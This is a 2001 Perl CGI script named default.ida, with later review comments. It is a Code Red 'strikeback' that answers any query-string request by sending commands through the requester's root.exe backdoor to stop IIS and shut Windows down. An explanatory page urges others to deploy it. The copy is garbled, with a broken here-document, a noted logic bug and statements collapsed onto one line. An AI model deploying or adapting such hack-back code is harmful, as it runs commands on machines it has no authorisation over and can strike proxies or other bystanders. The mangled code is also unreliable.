#!/usr/bin/perl -w
# default.ida in perl
# Copyright 2001 Sam Phillips
# ideas borrowed from Erin Quinlan
# ideas provided by various Internet folk, and all those darn
# Crackmonkeys (http://www.crackmonkey.org) and Pigdoggers
# (http://www.pigdog.org)
#
# Things that this should do...
# * Send email to the machine owner
# * Not act as an attack amplifier - someone could theoretically use this
#   to launch a DOS attack of sorts.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# This has been modified pretty much randomly by Chunky
# Specifically, it doesn't e-mail the admin, since the admin obviously
# doesn't care.
# It also has been re-ordered so it attempts to shut down the server,
# before rebooting IIS; elsewise, how is the server gonna be
# rebooted?
# This is nowadays less effective than another script I wrote,
# available from http://icculus.org/~chunky/iis/
# Gary (-;

# Review summary of what the code below does:
#   - Runs as a CGI script. When QUERY_STRING is non-empty it sends HTTP GET
#     requests to the address in REMOTE_ADDR, at /scripts/root.exe, and then
#     prints a static explanatory page.
#   - The only trigger condition is a non-empty query string. No check that
#     the request resembles a worm probe, no rate limit and no per-address
#     bookkeeping is visible here, so the "attack amplifier" item in the
#     header above is still open: every such request causes outbound traffic.
#   - REMOTE_ADDR is the peer address the web server saw. If the request came
#     through a proxy or NAT gateway, the outbound request goes to that
#     intermediary rather than to the host that originated the request.
#   - For log review: the outbound requests carry the User-Agent string
#     "Code Red Strikeback" and target the path /scripts/root.exe.
#   - NOTE(review): this copy looks whitespace-mangled and HTML-stripped
#     (statements were collapsed onto one line, string literals contain raw
#     newlines, and the final here-document introducer is truncated).

use LWP::UserAgent;

# Unbuffer STDOUT so progress lines reach the client while requests are pending.
$|++;

print "Content-Type: text/html\n\n";

# NOTE(review): QUERY_STRING may be unset outside a CGI environment; with -w
# the comparison on undef can emit a warning.
if (length ($ENV{QUERY_STRING}) > 0) {
    my $ua = new LWP::UserAgent;
    $ua->agent ("Code Red Strikeback");
    # A slow or unresponsive peer keeps this CGI process occupied for the
    # duration of the timeout, per outbound request.
    $ua->timeout (20);

    # Both request objects interpolate REMOTE_ADDR straight into the URL.
    my $server_stop_req = new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");
    my $iis_stop_req = new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop");

    print "probulating...
";
    my $resp = $ua->request ($iis_stop_req);

    # is_success reflects only the HTTP status of the response; nothing here
    # verifies what the remote host actually did with the request.
    if ($resp->is_success) {
        print "Appears we have shut down IIS...
";
        # This inner `my` shadows the $server_stop_req declared above.
        my $server_stop_req = new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");
        # As written, $iis_stop_req is the object passed to request() again;
        # neither $server_stop_req is passed to request() anywhere in this
        # script, so the message below reports on a second IIS-stop response.
        # This also differs from the ordering described in the header comment.
        $resp = $ua->request ($iis_stop_req);
        if ($resp->is_success) {
            print "Appears that we have also shutdown whatever OS too...
";
        }
        # ok this will do magic email stuff when I get a chance to write it.
    } else {
        print "

Looks like you're still here...

";
    }
}

# NOTE(review): the line below is presumably the remains of a here-document
# introducer terminated by the EOF line at the end; as it stands in this copy
# it is not a valid here-document, and the page markup appears to be missing.
# The text is printed for every request, whether or not the branch above ran.
print <

WELCOME PEOPLE!

If you are reading this page, then you are probably curious...

This page is actually a script that will connect to your machine and try to shut it down. Since you are seeing this you probably aren't a Code Red infected box.

This will only work if you are infected with the "code red" virus which isn't really a virus but is a part of the Microsoft Internet Information Server (IIS).

If you were a Code Red infected IIS then the command just sent to port 80 was to stop iis and to reboot your machine. If you aren't infected, then you have nothing to worry about, otherwise.. you should really use a secure webserver don't you think?.. one that doesn't let people in a gaping back door to do stuff like this...)

This is how you can protect yourself and others, if you run perl, and a competent web server:

  1. Download this script.
  2. Rename it default.ida and place it in the DocumentRoot of your server
  3. Make sure the .ida extension is handled as a perl CGI script.
If you can't figure out any of the above instructions then find someone who can.

EOF